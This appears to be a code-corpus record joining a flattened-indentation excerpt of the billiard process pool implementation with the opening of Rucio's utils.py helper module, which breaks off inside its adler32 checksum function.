# Thread killing timedout jobs.
self._timeout_handler = self.TimeoutHandler(
self._pool, self._cache,
self.soft_timeout, self.timeout,
)
self._timeout_handler_mutex = Lock()
self._timeout_handler_started = False
if self.timeout is not None or self.soft_timeout is not None:
self._start_timeout_handler()
# If running without threads, we need to check for timeouts
# while waiting for unfinished work at shutdown.
self.check_timeouts = None
if not threads:
self.check_timeouts = self._timeout_handler.handle_event
# Thread processing results in the outqueue.
self._result_handler = self.create_result_handler()
self.handle_result_event = self._result_handler.handle_event
if threads:
self._result_handler.start()
self._terminate = Finalize(
self, self._terminate_pool,
args=(self._taskqueue, self._inqueue, self._outqueue,
self._pool, self._worker_handler, self._task_handler,
self._result_handler, self._cache,
self._timeout_handler,
self._help_stuff_finish_args()),
exitpriority=15,
)
def Process(self, *args, **kwds):
return self._ctx.Process(*args, **kwds)
def WorkerProcess(self, worker):
return worker.contribute_to_object(self.Process(target=worker))
def create_result_handler(self, **extra_kwargs):
return self.ResultHandler(
self._outqueue, self._quick_get, self._cache,
self._poll_result, self._join_exited_workers,
self._putlock, self.restart_state, self.check_timeouts,
self.on_job_ready, **extra_kwargs
)
def on_job_ready(self, job, i, obj, inqW_fd):
pass
def _help_stuff_finish_args(self):
return self._inqueue, self._task_handler, self._pool
def cpu_count(self):
try:
return cpu_count()
except NotImplementedError:
return 1
def handle_result_event(self, *args):
return self._result_handler.handle_event(*args)
def _process_register_queues(self, worker, queues):
pass
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self._pool)
if proc.pid == pid
), (None, None))
def get_process_queues(self):
return self._inqueue, self._outqueue, None
def _create_worker_process(self, i):
sentinel = self._ctx.Event() if self.allow_restart else None
inq, outq, synq = self.get_process_queues()
w = self.WorkerProcess(self.Worker(
inq, outq, synq, self._initializer, self._initargs,
self._maxtasksperchild, sentinel, self._on_process_exit,
# Need to handle all signals if using the ipc semaphore,
# to make sure the semaphore is released.
sigprotection=self.threads,
wrap_exception=self._wrap_exception,
max_memory_per_child=self._max_memory_per_child,
))
self._pool.append(w)
self._process_register_queues(w, (inq, outq, synq))
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.index = i
w.start()
self._poolctrl[w.pid] = sentinel
if self.on_process_up:
self.on_process_up(w)
return w
def process_flush_queues(self, worker):
pass
def _join_exited_workers(self, shutdown=False):
"""Cleanup after any worker processes which have exited due to
reaching their specified lifetime. Returns True if any workers were
cleaned up.
"""
now = None
# The worker may have published a result before being terminated,
# but we have no way to accurately tell if it did. So we wait for
# _lost_worker_timeout seconds before we mark the job with
# WorkerLostError.
for job in [job for job in list(self._cache.values())
if not job.ready() and job._worker_lost]:
now = now or monotonic()
lost_time, lost_ret = job._worker_lost
if now - lost_time > job._lost_worker_timeout:
self.mark_as_worker_lost(job, lost_ret)
if shutdown and not len(self._pool):
raise WorkersJoined()
cleaned, exitcodes = {}, {}
for i in reversed(range(len(self._pool))):
worker = self._pool[i]
exitcode = worker.exitcode
popen = worker._popen
if popen is None or exitcode is not None:
# worker exited
debug('Supervisor: cleaning up worker %d', i)
if popen is not None:
worker.join()
                    debug('Supervisor: worker %d joined', i)
cleaned[worker.pid] = worker
exitcodes[worker.pid] = exitcode
if exitcode not in (EX_OK, EX_RECYCLE) and \
not getattr(worker, '_controlled_termination', False):
error(
'Process %r pid:%r exited with %r',
worker.name, worker.pid, human_status(exitcode),
exc_info=0,
)
self.process_flush_queues(worker)
del self._pool[i]
del self._poolctrl[worker.pid]
if cleaned:
all_pids = [w.pid for w in self._pool]
for job in list(self._cache.values()):
acked_by_gone = next(
(pid for pid in job.worker_pids()
if pid in cleaned or pid not in all_pids),
None
)
# already accepted by process
if acked_by_gone:
self.on_job_process_down(job, acked_by_gone)
if not job.ready():
exitcode = exitcodes.get(acked_by_gone) or 0
proc = cleaned.get(acked_by_gone)
if proc and getattr(proc, '_job_terminated', False):
job._set_terminated(exitcode)
else:
self.on_job_process_lost(
job, acked_by_gone, exitcode,
)
else:
# started writing to
write_to = job._write_to
# was scheduled to write to
sched_for = job._scheduled_for
if write_to and not write_to._is_alive():
self.on_job_process_down(job, write_to.pid)
elif sched_for and not sched_for._is_alive():
self.on_job_process_down(job, sched_for.pid)
for worker in values(cleaned):
if self.on_process_down:
if not shutdown:
self._process_cleanup_queues(worker)
self.on_process_down(worker)
return list(exitcodes.values())
return []
def on_partial_read(self, job, worker):
pass
def _process_cleanup_queues(self, worker):
pass
def on_job_process_down(self, job, pid_gone):
pass
def on_job_process_lost(self, job, pid, exitcode):
job._worker_lost = (monotonic(), exitcode)
def mark_as_worker_lost(self, job, exitcode):
try:
raise WorkerLostError(
'Worker exited prematurely: {0}.'.format(
human_status(exitcode)),
)
except WorkerLostError:
job._set(None, (False, ExceptionInfo()))
else: # pragma: no cover
pass
def __enter__(self):
return self
def __exit__(self, *exc_info):
return self.terminate()
def on_grow(self, n):
pass
def on_shrink(self, n):
pass
def shrink(self, n=1):
for i, worker in enumerate(self._iterinactive()):
self._processes -= 1
if self._putlock:
self._putlock.shrink()
worker.terminate_controlled()
self.on_shrink(1)
if i >= n - 1:
break
else:
raise ValueError("Can't shrink pool. All processes busy!")
def grow(self, n=1):
for i in range(n):
self._processes += 1
if self._putlock:
self._putlock.grow()
self.on_grow(n)
def _iterinactive(self):
for worker in self._pool:
if not self._worker_active(worker):
yield worker
def _worker_active(self, worker):
for job in values(self._cache):
if worker.pid in job.worker_pids():
return True
return False
def _repopulate_pool(self, exitcodes):
"""Bring the number of pool processes up to the specified number,
for use after reaping workers which have exited.
"""
for i in range(self._processes - len(self._pool)):
if self._state != RUN:
return
try:
if exitcodes and exitcodes[i] not in (EX_OK, EX_RECYCLE):
self.restart_state.step()
except IndexError:
self.restart_state.step()
self._create_worker_process(self._avail_index())
debug('added worker')
def _avail_index(self):
assert len(self._pool) < self._processes
indices = set(p.index for p in self._pool)
return next(i for i in range(self._processes) if i not in indices)
def did_start_ok(self):
return not self._join_exited_workers()
def _maintain_pool(self):
""""Clean up any exited workers and start replacements for them.
"""
joined = self._join_exited_workers()
self._repopulate_pool(joined)
for i in range(len(joined)):
if self._putlock is not None:
self._putlock.release()
def maintain_pool(self):
if self._worker_handler._state == RUN and self._state == RUN:
try:
self._maintain_pool()
except RestartFreqExceeded:
self.close()
self.join()
raise
except OSError as exc:
if get_errno(exc) == errno.ENOMEM:
reraise(MemoryError,
MemoryError(str(exc)),
sys.exc_info()[2])
raise
def _setup_queues(self):
self._inqueue = self._ctx.SimpleQueue()
self._outqueue = self._ctx.SimpleQueue()
self._quick_put = self._inqueue._writer.send
self._quick_get = self._outqueue._reader.recv
def _poll_result(timeout):
if self._outqueue._reader.poll(timeout):
return True, self._quick_get()
return False, None
self._poll_result = _poll_result
def _start_timeout_handler(self):
# ensure more than one thread does not start the timeout handler
# thread at once.
if self.threads:
with self._timeout_handler_mutex:
if not self._timeout_handler_started:
self._timeout_handler_started = True
self._timeout_handler.start()
def apply(self, func, args=(), kwds={}):
'''
Equivalent of `func(*args, **kwargs)`.
'''
if self._state == RUN:
return self.apply_async(func, args, kwds).get()
def starmap(self, func, iterable, chunksize=None):
'''
Like the `map()` method, but the elements of `iterable` are expected to
be iterables themselves and are unpacked as arguments, so an iterable of
`[(1, 2), (3, 4)]` results in `[func(1, 2), func(3, 4)]`.
'''
if self._state == RUN:
return self._map_async(func, iterable,
starmapstar, chunksize).get()
def starmap_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous version of `starmap()` method.
'''
if self._state == RUN:
return self._map_async(func, iterable, starmapstar, chunksize,
callback, error_callback)
def map(self, func, iterable, chunksize=None):
'''
Apply `func` to each element in `iterable`, collecting the results
in a list that is returned.
'''
if self._state == RUN:
return self.map_async(func, iterable, chunksize).get()
def imap(self, func, iterable, chunksize=1, lost_worker_timeout=None):
'''
Equivalent of `map()` -- can be MUCH slower than `Pool.map()`.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
def imap_unordered(self, func, iterable, chunksize=1,
lost_worker_timeout=None):
'''
Like `imap()` method but ordering of results is arbitrary.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
def apply_async(self, func, args=(), kwds={},
callback=None, error_callback=None, accept_callback=None,
timeout_callback=None, waitforslot=None,
soft_timeout=None, timeout=None, lost_worker_timeout=None,
callbacks_propagate=(),
correlation_id=None):
'''
Asynchronous equivalent of `apply()` method.
Callback is called when the function's return value is ready.
The accept callback is called when the job is accepted to be executed.
Simplified, the flow is like this:
>>> def apply_async(func, args, kwds, callback, accept_callback):
... if accept_callback:
... accept_callback()
... retval = func(*args, **kwds)
... if callback:
... callback(retval)
'''
if self._state != RUN:
return
soft_timeout = soft_timeout or self.soft_timeout
timeout = timeout or self.timeout
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if soft_timeout and SIG_SOFT_TIMEOUT is None:
warnings.warn(UserWarning(
"Soft timeouts are not supported: "
"on this platform: It does not have the SIGUSR1 signal.",
))
soft_timeout = None
if self._state == RUN:
waitforslot = self.putlocks if waitforslot is None else waitforslot
if waitforslot and self._putlock is not None:
self._putlock.acquire()
result = ApplyResult(
self._cache, callback, accept_callback, timeout_callback,
error_callback, soft_timeout, timeout, lost_worker_timeout,
on_timeout_set=self.on_timeout_set,
on_timeout_cancel=self.on_timeout_cancel,
callbacks_propagate=callbacks_propagate,
send_ack=self.send_ack if self.synack else None,
correlation_id=correlation_id,
)
if timeout or soft_timeout:
# start the timeout handler thread when required.
self._start_timeout_handler()
if self.threads:
self._taskqueue.put(([(TASK, (result._job, None,
func, args, kwds))], None))
else:
self._quick_put((TASK, (result._job, None, func, args, kwds)))
return result
def send_ack(self, response, job, i, fd):
pass
def terminate_job(self, pid, sig=None):
proc, _ = self._process_by_pid(pid)
if proc is not None:
try:
_kill(pid, sig or signal.SIGTERM)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
else:
proc._controlled_termination = True
proc._job_terminated = True
def map_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous equivalent of `map()` method.
'''
return self._map_async(
func, iterable, mapstar, chunksize, callback, error_callback,
)
def _map_async(self, func, iterable, mapper, chunksize=None,
callback=None, error_callback=None):
'''
Helper function to implement map, starmap and their async counterparts.
'''
if self._state != RUN:
return
if not hasattr(iterable, '__len__'):
iterable = list(iterable)
if chunksize is None:
chunksize, extra = divmod(len(iterable), len(self._pool) * 4)
if extra:
chunksize += 1
if len(iterable) == 0:
chunksize = 0
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = MapResult(self._cache, chunksize, len(iterable), callback,
error_callback=error_callback)
self._taskqueue.put((((TASK, (result._job, i, mapper, (x,), {}))
for i, x in enumerate(task_batches)), None))
return result
@staticmethod
def _get_tasks(func, it, size):
it = iter(it)
while 1:
x = tuple(itertools.islice(it, size))
if not x:
return
yield (func, x)
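# Illustrative note (not part of the original source): _get_tasks slices the
# iterable into size-limited batches, e.g.
#   list(Pool._get_tasks(f, range(5), 2)) --> [(f, (0, 1)), (f, (2, 3)), (f, (4,))]
# Each batch is later unpacked by mapstar/starmapstar inside a worker process.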
def __reduce__(self):
raise NotImplementedError(
'pool objects cannot be passed between processes or pickled',
)
def close(self):
debug('closing pool')
if self._state == RUN:
self._state = CLOSE
if self._putlock:
self._putlock.clear()
self._worker_handler.close()
self._taskqueue.put(None)
stop_if_not_current(self._worker_handler)
def terminate(self):
debug('terminating pool')
self._state = TERMINATE
self._worker_handler.terminate()
self._terminate()
@staticmethod
def _stop_task_handler(task_handler):
stop_if_not_current(task_handler)
def join(self):
assert self._state in (CLOSE, TERMINATE)
debug('joining worker handler')
stop_if_not_current(self._worker_handler)
debug('joining task handler')
self._stop_task_handler(self._task_handler)
debug('joining result handler')
stop_if_not_current(self._result_handler)
debug('result handler joined')
for i, p in enumerate(self._pool):
debug('joining worker %s/%s (%r)', i+1, len(self._pool), p)
if p._popen is not None: # process started?
p.join()
debug('pool join complete')
def restart(self):
for e in values(self._poolctrl):
e.set()
@staticmethod
def _help_stuff_finish(inqueue, task_handler, _pool):
# task_handler may be blocked trying to put items on inqueue
debug('removing tasks from inqueue until task handler finished')
inqueue._rlock.acquire()
while task_handler.is_alive() and inqueue._reader.poll():
inqueue._reader.recv()
time.sleep(0)
@classmethod
def _set_result_sentinel(cls, outqueue, pool):
outqueue.put(None)
@classmethod
def _terminate_pool(cls, taskqueue, inqueue, outqueue, pool,
worker_handler, task_handler,
result_handler, cache, timeout_handler,
help_stuff_finish_args):
# this is guaranteed to only be called once
debug('finalizing pool')
worker_handler.terminate()
task_handler.terminate()
taskqueue.put(None) # sentinel
debug('helping task handler/workers to finish')
cls._help_stuff_finish(*help_stuff_finish_args)
result_handler.terminate()
cls._set_result_sentinel(outqueue, pool)
if timeout_handler is not None:
timeout_handler.terminate()
# Terminate workers which haven't already finished
if pool and hasattr(pool[0], 'terminate'):
debug('terminating workers')
for p in pool:
if p._is_alive():
p.terminate()
debug('joining task handler')
cls._stop_task_handler(task_handler)
debug('joining result handler')
result_handler.stop()
if timeout_handler is not None:
debug('joining timeout handler')
timeout_handler.stop(TIMEOUT_MAX)
if pool and hasattr(pool[0], 'terminate'):
debug('joining pool workers')
for p in pool:
if p.is_alive():
# worker has not yet exited
debug('cleaning up worker %d', p.pid)
if p._popen is not None:
p.join()
debug('pool workers joined')
@property
def process_sentinels(self):
return [w._popen.sentinel for w in self._pool]
#
# Class whose instances are returned by `Pool.apply_async()`
#
class ApplyResult(object):
_worker_lost = None
_write_to = None
_scheduled_for = None
def __init__(self, cache, callback, accept_callback=None,
timeout_callback=None, error_callback=None, soft_timeout=None,
timeout=None, lost_worker_timeout=LOST_WORKER_TIMEOUT,
on_timeout_set=None, on_timeout_cancel=None,
callbacks_propagate=(), send_ack=None,
correlation_id=None):
self.correlation_id = correlation_id
self._mutex = Lock()
self._event = threading.Event()
self._job = next(job_counter)
self._cache = cache
self._callback = callback
self._accept_callback = accept_callback
self._error_callback = error_callback
self._timeout_callback = timeout_callback
self._timeout = timeout
self._soft_timeout = soft_timeout
self._lost_worker_timeout = lost_worker_timeout
self._on_timeout_set = on_timeout_set
self._on_timeout_cancel = on_timeout_cancel
self._callbacks_propagate = callbacks_propagate or ()
self._send_ack = send_ack
self._accepted = False
self._cancelled = False
self._worker_pid = None
self._time_accepted = None
self._terminated = None
cache[self._job] = self
def __repr__(self):
return '<Result: {id} ack:{ack} ready:{ready}>'.format(
id=self._job, ack=self._accepted, ready=self.ready(),
)
def ready(self):
return self._event.isSet()
def accepted(self):
return self._accepted
def successful(self):
assert self.ready()
return self._success
def _cancel(self):
"""Only works if synack is used."""
self._cancelled = True
def discard(self):
self._cache.pop(self._job, None)
def terminate(self, signum):
self._terminated = signum
def _set_terminated(self, signum=None):
try:
raise Terminated(-(signum or 0))
except Terminated:
self._set(None, (False, ExceptionInfo()))
def worker_pids(self):
return [self._worker_pid] if self._worker_pid else []
def wait(self, timeout=None):
self._event.wait(timeout)
def get(self, timeout=None):
self.wait(timeout)
if not self.ready():
raise TimeoutError
if self._success:
return self._value
else:
raise self._value.exception
def safe_apply_callback(self, fun, *args, **kwargs):
if fun:
try:
fun(*args, **kwargs)
except self._callbacks_propagate:
raise
except Exception as exc:
error('Pool callback raised exception: %r', exc,
exc_info=1)
def handle_timeout(self, soft=False):
if self._timeout_callback is not None:
self.safe_apply_callback(
self._timeout_callback, soft=soft,
timeout=self._soft_timeout if soft else self._timeout,
)
def _set(self, i, obj):
with self._mutex:
if self._on_timeout_cancel:
self._on_timeout_cancel(self)
self._success, self._value = obj
self._event.set()
if self._accepted:
# if not accepted yet, then the set message
# was received before the ack, which means
# the ack will remove the entry.
self._cache.pop(self._job, None)
# apply callbacks last
if self._callback and self._success:
self.safe_apply_callback(
self._callback, self._value)
if (self._value is not None and
self._error_callback and not self._success):
self.safe_apply_callback(
self._error_callback, self._value)
def _ack(self, i, time_accepted, pid, synqW_fd):
with self._mutex:
if self._cancelled and self._send_ack:
self._accepted = True
if synqW_fd:
return self._send_ack(NACK, pid, self._job, synqW_fd)
return
self._accepted = True
self._time_accepted = time_accepted
self._worker_pid = pid
if self.ready():
# ack received after set()
self._cache.pop(self._job, None)
if self._on_timeout_set:
self._on_timeout_set(self, self._soft_timeout, self._timeout)
response = ACK
if self._accept_callback:
try:
self._accept_callback(pid, time_accepted)
except self._callbacks_propagate:
response = NACK
raise
except Exception:
response = NACK
# ignore other errors
finally:
if self._send_ack and synqW_fd:
return self._send_ack(
response, pid, self._job, synqW_fd
)
if self._send_ack and synqW_fd:
self._send_ack(response, pid, self._job, synqW_fd)
#
# Class whose instances are returned by `Pool.map_async()`
#
class MapResult(ApplyResult):
def __init__(self, cache, chunksize, length, callback, error_callback):
ApplyResult.__init__(
self, cache, callback, error_callback=error_callback,
)
self._success = True
self._length = length
self._value = [None] * length
self._accepted = [False] * length
self._worker_pid = [None] * length
self._time_accepted = [None] * length
self._chunksize = chunksize
if chunksize <= 0:
self._number_left = 0
self._event.set()
del cache[self._job]
else:
self._number_left = length // chunksize + bool(length % chunksize)
def _set(self, i, success_result):
success, result = success_result
if success:
self._value[i * self._chunksize:(i + 1) * self._chunksize] = result
self._number_left -= 1
if self._number_left == 0:
if self._callback:
self._callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
else:
self._success = False
self._value = result
if self._error_callback:
self._error_callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
def _ack(self, i, time_accepted, pid, *args):
start = i * self._chunksize
stop = min((i + 1) * self._chunksize, self._length)
for j in range(start, stop):
self._accepted[j] = True
self._worker_pid[j] = pid
self._time_accepted[j] = time_accepted
if self.ready():
self._cache.pop(self._job, None)
def accepted(self):
return all(self._accepted)
def worker_pids(self):
return [pid for pid in self._worker_pid if pid]
#
# Class whose instances are returned by `Pool.imap()`
#
class IMapIterator(object):
_worker_lost = None
def __init__(self, cache, lost_worker_timeout=LOST_WORKER_TIMEOUT):
self._cond = threading.Condition(threading.Lock())
self._job = next(job_counter)
self._cache = cache
self._items = deque()
self._index = 0
self._length = None
self._ready = False
self._unsorted = {}
self._worker_pids = []
self._lost_worker_timeout = lost_worker_timeout
cache[self._job] = self
def __iter__(self):
return self
def next(self, timeout=None):
with self._cond:
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
self._cond.wait(timeout)
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
raise TimeoutError
success, value = item
if success:
return value
raise Exception(value)
__next__ = next # XXX
def _set(self, i, obj):
with self._cond:
if self._index == i:
self._items.append(obj)
self._index += 1
while self._index in self._unsorted:
obj = self._unsorted.pop(self._index)
self._items.append(obj)
self._index += 1
self._cond.notify()
else:
self._unsorted[i] = obj
if self._index == self._length:
self._ready = True
del self._cache[self._job]
def _set_length(self, length):
with self._cond:
self._length = length
if self._index == self._length:
self._ready = True
self._cond.notify()
del self._cache[self._job]
def _ack(self, i, time_accepted, pid, *args):
self._worker_pids.append(pid)
def ready(self):
return self._ready
def worker_pids(self):
return self._worker_pids
#
# Class whose instances are returned by `Pool.imap_unordered()`
#
class IMapUnorderedIterator(IMapIterator):
def _set(self, i, obj):
with self._cond:
self._items.append(obj)
self._index += 1
self._cond.notify()
if self._index == self._length:
self._ready = True
del self._cache[self._job]
#
#
#
class ThreadPool(Pool):
from billiard.dummy import Process as DummyProcess
Process = DummyProcess
def __init__(self, processes=None, initializer=None, initargs=()):
Pool.__init__(self, processes, initializer, initargs)
def _setup_queues(self):
self._inqueue = Queue()
self._outqueue = Queue()
self._quick_put = self._inqueue.put
self._quick_get = self._outqueue.get
def _poll_result(timeout):
try:
return True, self._quick_get(timeout=timeout)
except Empty:
return False, None
self._poll_result = _poll_result
@staticmethod
def _help_stuff_finish(inqueue, task_handler, pool):
# put sentinels at head of inqueue to make workers finish
with inqueue.not_empty:
inqueue.queue.clear()
inqueue.queue.extend([None] * len(pool))
inqueue.not_empty.notify_all()
|
utils.py
|
# Copyright 2012-2019 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vgaronne@gmail.com>, 2012-2018
# - Thomas Beermann <thomas.beermann@cern.ch>, 2012-2018
# - Mario Lassnig <mario.lassnig@cern.ch>, 2012-2019
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013-2017
# - Ralph Vigne <ralph.vigne@cern.ch>, 2013
# - Joaquin Bogado <jbogado@linti.unlp.edu.ar>, 2015-2018
# - Martin Barisits <martin.barisits@cern.ch>, 2016-2019
# - Frank Berghaus, <frank.berghaus@cern.ch>, 2017
# - Brian Bockelman <bbockelm@cse.unl.edu>, 2018
# - Tobias Wegner <twegner@cern.ch>, 2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Andrew Lister, <andrew.lister@stfc.ac.uk>, 2019
# - Gabriele Fronze' <gfronze@cern.ch>, 2019
# - Jaroslav Guenther <jaroslav.guenther@gmail.com>, 2019
#
# PY3K COMPATIBLE
from __future__ import print_function
import base64
import datetime
import errno
import getpass
import hashlib
import imp
import json
import os
import os.path
import re
import requests
import socket
import subprocess
import tempfile
import threading
import time
import zlib
from logging import getLogger, Formatter
from logging.handlers import RotatingFileHandler
from uuid import uuid4 as uuid
from six import string_types, PY3
from xml.etree import ElementTree
try:
# Python 2
from itertools import izip_longest
except ImportError:
# Python 3
from itertools import zip_longest as izip_longest
try:
# Python 2
from urllib import urlencode, quote
except ImportError:
# Python 3
from urllib.parse import urlencode, quote
try:
# Python 2
from StringIO import StringIO
except ImportError:
# Python 3
from io import StringIO
try:
# Python 2
import urlparse
except ImportError:
# Python 3
import urllib.parse as urlparse
from rucio.common.config import config_get
from rucio.common.exception import MissingModuleException, InvalidType, InputValidationError, MetalinkJsonParsingError
from rucio.common.types import InternalAccount, InternalScope
# delay import until function to avoid circular dependency (note here for reference)
# from rucio.core.rse import get_rse_name
# Extra modules: Only imported if available
EXTRA_MODULES = {'web': False,
'paramiko': False,
'flask': False}
try:
from rucio.db.sqla.enum import EnumSymbol
EXTRA_MODULES['rucio.db.sqla.enum'] = True
except ImportError:
EXTRA_MODULES['rucio.db.sqla.enum'] = False
for extra_module in EXTRA_MODULES:
try:
imp.find_module(extra_module)
EXTRA_MODULES[extra_module] = True
except ImportError:
EXTRA_MODULES[extra_module] = False
if EXTRA_MODULES['web']:
from web import HTTPError
if EXTRA_MODULES['paramiko']:
try:
from paramiko import RSAKey
except Exception:
EXTRA_MODULES['paramiko'] = False
if EXTRA_MODULES['flask']:
from flask import Response
# HTTP code dictionary. Not complete. Can be extended if needed.
codes = {
# Informational.
200: '200 OK',
201: '201 Created',
202: '202 Accepted',
# Client Error.
400: '400 Bad Request',
401: '401 Unauthorized',
403: '403 Forbidden',
404: '404 Not Found',
405: '405 Method Not Allowed',
406: '406 Not Acceptable',
408: '408 Request Timeout',
409: '409 Conflict',
410: '410 Gone',
# Server Error.
500: '500 Internal Server Error',
501: '501 Not Implemented',
502: '502 Bad Gateway',
503: '503 Service Unavailable',
504: '504 Gateway Timeout'
}
# RFC 1123 (ex RFC 822)
DATE_FORMAT = '%a, %d %b %Y %H:%M:%S UTC'
def build_url(url, path=None, params=None, doseq=False):
"""
utitily function to build an url for requests to the rucio system.
If the optional parameter doseq is evaluates to True, individual key=value pairs
separated by '&' are generated for each element of the value sequence for the key.
"""
complete_url = url
if path is not None:
complete_url += "/" + path
if params is not None:
complete_url += "?"
if isinstance(params, str):
complete_url += quote(params)
else:
complete_url += urlencode(params, doseq=doseq)
return complete_url
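# Illustrative example (not part of the original module; the host is hypothetical):
#   build_url('https://rucio.example.org', path='dids', params={'name': ['a', 'b']}, doseq=True)
#   --> 'https://rucio.example.org/dids?name=a&name=b'
# With doseq=False the list would instead be encoded as a single quoted value.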
def oidc_identity_string(sub, iss):
"""
Transform IdP sub claim and issuers url into users identity string.
:param sub: users SUB claim from the Identity Provider
:param iss: issuer (IdP) https url
:returns: OIDC identity string "SUB=<usersid>, ISS=https://iam-test.ch/"
"""
return 'SUB=' + str(sub) + ', ISS=' + str(iss)
def all_oidc_req_claims_present(scope, audience, required_scope, required_audience, sepatator=" "):
"""
Checks if both of the following statements are true:
- all items in required_scope are present in scope
- all items in required_audience are present in audience
and returns False otherwise. audience and scope must be either both strings
or both lists, and similarly for the required_* variables; if they are not,
False is returned.
:params scope: list of strings or one string where items are separated by a separator input variable
:params audience: list of strings or one string where items are separated by a separator input variable
:params required_scope: list of strings or one string where items are separated by a separator input variable
:params required_audience: list of strings or one string where items are separated by a separator input variable
:params sepatator: separator string, space by default
:returns : True or False
"""
if not scope:
scope = ""
if not audience:
audience = ""
if not required_scope:
required_scope = ""
if not required_audience:
required_audience = ""
if (isinstance(scope, list) and isinstance(audience, list) and # NOQA: W504
isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope for elem in required_scope)
req_audience_present = all(elem in audience for elem in required_audience)
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) and # NOQA: W504
isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = str(scope)
audience = str(audience)
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, list) and isinstance(audience, list) and # NOQA: W504
isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) and # NOQA: W504
isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = str(scope)
audience = str(audience)
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope)
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience)
return req_scope_present and req_audience_present
else:
return False
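# Illustrative examples (not part of the original module):
#   all_oidc_req_claims_present('openid profile email', 'rucio', 'openid profile', 'rucio')  --> True
#   all_oidc_req_claims_present(['openid'], ['rucio'], 'openid profile', 'rucio')            --> False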
def generate_uuid():
return str(uuid()).replace('-', '').lower()
def generate_uuid_bytes():
return uuid().bytes
def clean_headers(msg):
invalid_characters = ['\n', '\r']
for c in invalid_characters:
msg = str(msg).replace(c, ' ')
return msg
# GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5', 'sha256', 'crc32']
GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5']
CHECKSUM_ALGO_DICT = {}
PREFERRED_CHECKSUM = GLOBALLY_SUPPORTED_CHECKSUMS[0]
CHECKSUM_KEY = 'supported_checksums'
def is_checksum_valid(checksum_name):
"""
A simple function to check whether a checksum algorithm is supported.
Relies on GLOBALLY_SUPPORTED_CHECKSUMS to allow for expandability.
:param checksum_name: The name of the checksum to be verified.
:returns: True if checksum_name is in GLOBALLY_SUPPORTED_CHECKSUMS list, False otherwise.
"""
return checksum_name in GLOBALLY_SUPPORTED_CHECKSUMS
def set_checksum_value(file, checksum_names_list):
for checksum_name in checksum_names_list:
if checksum_name in file['metadata'].keys() and file['metadata'][checksum_name]:
file['checksum'] = '%s:%s' % (checksum_name.upper(), str(file['metadata'][checksum_name]))
if checksum_name == PREFERRED_CHECKSUM:
break
def adler32(file):
"""
An Adler-32 checksum is obtained by calculating two 16-bit checksums A and B and concatenating their bits into a 32-bit integer. A is the sum of all bytes in the stream plus one, and B is the sum of the individual values of A from each step.
:param file: file name
:returns: Hexified string, padded to 8 values.
"""
# adler starting value is _not_ 0
adler = 1
try:
with open(file, 'rb') as openFile:
for line in openFile:
adler = zlib.adler32(line, adler)
except Exception as e:
raise Exception('FATAL - could not get Adler32 checksum of file %s - %s' % (file, e))
